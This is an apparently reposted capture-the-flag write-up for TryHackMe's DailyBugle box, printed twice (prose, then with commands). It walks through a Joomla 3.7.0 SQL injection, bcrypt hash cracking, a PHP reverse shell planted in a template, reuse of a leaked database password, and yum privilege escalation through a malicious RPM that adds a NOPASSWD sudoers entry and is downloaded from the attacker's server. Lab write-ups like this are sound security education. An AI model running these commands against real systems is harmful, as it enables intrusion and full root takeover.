takpa
Social Commerce Expert
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
100 XP
Introduction
DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and privilege escalation using yum.
Table of Content
Network Scanning
Enumeration
Exploitation
Privilege Escalation
Let’s deep dive into this.
Network Scanning
The dedicated IP address of the machine is 10.10.91.172. We’ll run a nmap scan on this machine’s IP.
Enumeration
We discovered the existence of a robots file that has an administrator directory.
Upon opening this directory we found out that an instance of Joomla was running on this website.
Thus, we ran joomscan on this website and discovered the version 3.7.0 being run
Right away we looked out for public exploits for this installed instance using searchsploit and discovered that version 3.7.0 was vulnerable to SQLi via the com_fields parameter.
Exploitation
As exploit number 42033 told us, this sql injection vulnerability could be exploited by the following command
However, while running this scan, it was taking way too long and so, we looked out for another script called “Joomblah.py” which is a POC for this SQLi vulnerability in Joomla v3.7.0. So we downloaded this script, ran and found credentials!
We had discovered the hash but to know it’s type we googled it up and found it was
bcrypt”
Thus we saved this hash in a file and used john to crack them
We see we have received clear text credentials. We logged in to the admin panel using this and can see a dashboard now!
Like with any other CMS, Joomla also has templates that are running on PHP, therefore, right away we copied the php-reverse-shell.php code in the template file and clicked on template preview. Before launching template preview we also set up a netcat listener
On our listener we see a shell popped up!
Privilege Escalation
Now that we have a working TTY on the victim box, we started looking for ways to escalate privileges. We checked the sudoers file but nothing was found.
After a quick system check and looking at the website’s files, we found a configuration file that had credentials of a database. root user had the password: nv5uz9r3ZEDzVjNu
Now, we tried to login into another existing user jjameson using this password and it worked! We immediately spawned a stable teletype using python. Thereafter, we looked into the sudoers file and found yum in the entries.
Referring to gtfobins post here we can escalate our privileges by creating our custom RPM executable. For this we need rpm, fpm to be installed first. Thereafter, we’ll copy a command into a shell script. This echo command simply adds my user jjameson into the sudoers file so that any command can be run as root. This would be our payload. Then we create an rpm package using fpm package.
Now all that’s left to do was to copy this file into /tmp directory on the victim’s box.
So, we downloaded it and ran using yum localinstall command. It ran successfully! We ran bash shell as sudo and as expected jjameson (my user) ran it as root and thus privileges were escalated! Finally, we read the congratulatory flag!
Hence, this is how we root this box. Kudos to the author on creating a beginner-friendly box that focuses on real life and commonly found vulnerabilities. Thanks for reading!
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contacthere
DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and privilege escalation using yum.
Table of Content
Network Scanning
- Nmap
Enumeration
- Discovering administrator directories using robots.txt
- Enumerating site using joomscan
- Discovering SQL injection flaw in the current installation
Exploitation
- Exploiting Joomla v 3.7.0 via SQLi in com_fields
- Cracking Joomla administrator hashes using john
- Modifying template to input PHP reverse shell code
Privilege Escalation
- Discovering other user’s credentials in the configuration file
- Elevating privileges using yum
Let’s deep dive into this.
Network Scanning
The dedicated IP address of the machine is 10.10.91.172. We’ll run a nmap scan on this machine’s IP.
Code:
nmap -sV -sC 10.10.91.172 -PnEnumeration
We discovered the existence of a robots file that has an administrator directory.
Upon opening this directory we found out that an instance of Joomla was running on this website.
Thus, we ran joomscan on this website and discovered the version 3.7.0 being run
Code:
joomscan -u http://10.10.91.172Right away we looked out for public exploits for this installed instance using searchsploit and discovered that version 3.7.0 was vulnerable to SQLi via the com_fields parameter.
Code:
searchsploit joomla 3.7.0
searchsploit -m 42033Exploitation
As exploit number 42033 told us, this sql injection vulnerability could be exploited by the following command
Code:
sqlmap -u "http://10.17.32.212/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dump-all -p list[fullordering]However, while running this scan, it was taking way too long and so, we looked out for another script called “Joomblah.py” which is a POC for this SQLi vulnerability in Joomla v3.7.0. So we downloaded this script, ran and found credentials!
Code:
wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py
python2.7 joomblah.py http://10.10.91.172We had discovered the hash but to know it’s type we googled it up and found it was
bcrypt”
Thus we saved this hash in a file and used john to crack them
Code:
cat hash
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hashWe see we have received clear text credentials. We logged in to the admin panel using this and can see a dashboard now!
Like with any other CMS, Joomla also has templates that are running on PHP, therefore, right away we copied the php-reverse-shell.php code in the template file and clicked on template preview. Before launching template preview we also set up a netcat listener
Code:
nc -nlvp 1234On our listener we see a shell popped up!
Privilege Escalation
Now that we have a working TTY on the victim box, we started looking for ways to escalate privileges. We checked the sudoers file but nothing was found.
After a quick system check and looking at the website’s files, we found a configuration file that had credentials of a database. root user had the password: nv5uz9r3ZEDzVjNu
Code:
cd /var/www/html
cat configuration.phpNow, we tried to login into another existing user jjameson using this password and it worked! We immediately spawned a stable teletype using python. Thereafter, we looked into the sudoers file and found yum in the entries.
Code:
su jjameson
python -c 'import pty;pty.spawn("/bin/bash")'
sudo -lReferring to gtfobins post here we can escalate our privileges by creating our custom RPM executable. For this we need rpm, fpm to be installed first. Thereafter, we’ll copy a command into a shell script. This echo command simply adds my user jjameson into the sudoers file so that any command can be run as root. This would be our payload. Then we create an rpm package using fpm package.
Code:
apt install rpm
gem install fpm
echo 'echo "jjameson ALL=(root) NOPASSWD:ALL" >> /etc/sudoers' > my.sh
fpm -n root -s dir -t rpm -a all --before-install my.sh .
python3 -m http.server 80Now all that’s left to do was to copy this file into /tmp directory on the victim’s box.
Code:
cd /tmp
wget http://10.17.32.212/root-1.0-1.noarch.rpmSo, we downloaded it and ran using yum localinstall command. It ran successfully! We ran bash shell as sudo and as expected jjameson (my user) ran it as root and thus privileges were escalated! Finally, we read the congratulatory flag!
Code:
sudo yum localinstall -y root-1.0-1.noarch.rpm
sudo bash
cd /root
cat root.txtHence, this is how we root this box. Kudos to the author on creating a beginner-friendly box that focuses on real life and commonly found vulnerabilities. Thanks for reading!
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contacthere